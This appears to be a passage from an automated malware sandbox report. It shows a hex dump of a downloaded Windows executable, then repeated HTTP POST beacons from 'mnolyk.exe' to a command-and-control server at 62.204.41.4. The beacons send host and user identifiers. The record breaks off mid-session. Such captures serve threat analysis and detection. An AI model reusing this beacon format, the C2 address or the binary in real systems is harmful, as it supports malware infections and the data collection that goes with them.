00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
Feb 7, 2023 19:57:03.765239954 CET	4	IN	Data Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff Data Ascii: j h<ph?#hYj8h<h#h`lYj8h<h"hLYj8h<h"h ,Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
Feb 7, 2023 19:57:03.765266895 CET	5	IN	Data Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08 Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
Feb 7, 2023 19:57:03.765295029 CET	7	IN	Data Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50 Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
Feb 7, 2023 19:57:03.765325069 CET	8	IN	Data Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
Feb 7, 2023 19:57:03.765357018 CET	9	IN	Data Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24 Data Ascii: A:Bu\|$t{A:Bts%snD$Pt$;D$TD$ D$@B\|$4QCD$$L$DPT$TD$@L$@C\|$Pu81u\|$0D$\|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
Feb 7, 2023 19:57:03.765387058 CET	11	IN	Data Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00 Data Ascii: lD$r;uD$D$s:u9\|$A:Bu&\|$A:Bu\|$A:Bt~GwvD$Pt$;D$TD$ D$@B\|$4QCD$$L$DPT$TD$@L$@C\|$Pu0xf90u\|$0D$\|$0L$@T$T
Feb 7, 2023 19:57:03.765418053 CET	12	IN	Data Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00 Data Ascii: rI#+RQ\|$thi5t$t$0hiL$xWxr\|$4L$ CL$ ;xudD$r;uD$D$s:u1\|$A:Bu\|$tzA:Bu\|$tkA:Btc_u^
Feb 7, 2023 19:57:03.765448093 CET	13	IN	Data Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8 Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
Feb 7, 2023 19:57:03.765480995 CET	15	IN	Data Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55 Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
Feb 7, 2023 19:57:03.828742981 CET	16	IN	Data Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85 Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49707	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:08.383912086 CET	106	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:08.449425936 CET	106	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.2.5	49807	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:33.429667950 CET	298	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:33.494484901 CET	298	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.2.5	49808	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:33.669442892 CET	299	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:33.732368946 CET	299	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.2.5	49809	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:33.899730921 CET	300	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:33.962928057 CET	300	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.2.5	49810	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:34.139597893 CET	301	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:34.206943989 CET	301	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.5	49811	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:34.389822006 CET	302	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:34.454195976 CET	302	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.5	49812	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:34.636727095 CET	303	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:34.699321985 CET	303	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.5	49813	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:34.897396088 CET	304	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:34.961111069 CET	304	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.5	49814	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:35.140362024 CET	305	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:35.204200029 CET	305	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.2.5	49815	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:35.404124022 CET	306	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:35.468318939 CET	306	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.2.5	49816	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:35.633778095 CET	307	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:35.696065903 CET	307	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49708	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:08.619163990 CET	107	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:08.681597948 CET	107	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.2.5	49817	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:35.876379967 CET	308	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:35.941781998 CET	308	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.2.5	49818	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:36.123766899 CET	309	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:36.189352036 CET	309	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.2.5	49819	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:36.373214960 CET	311	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:36.436902046 CET	311	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.5	49821	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
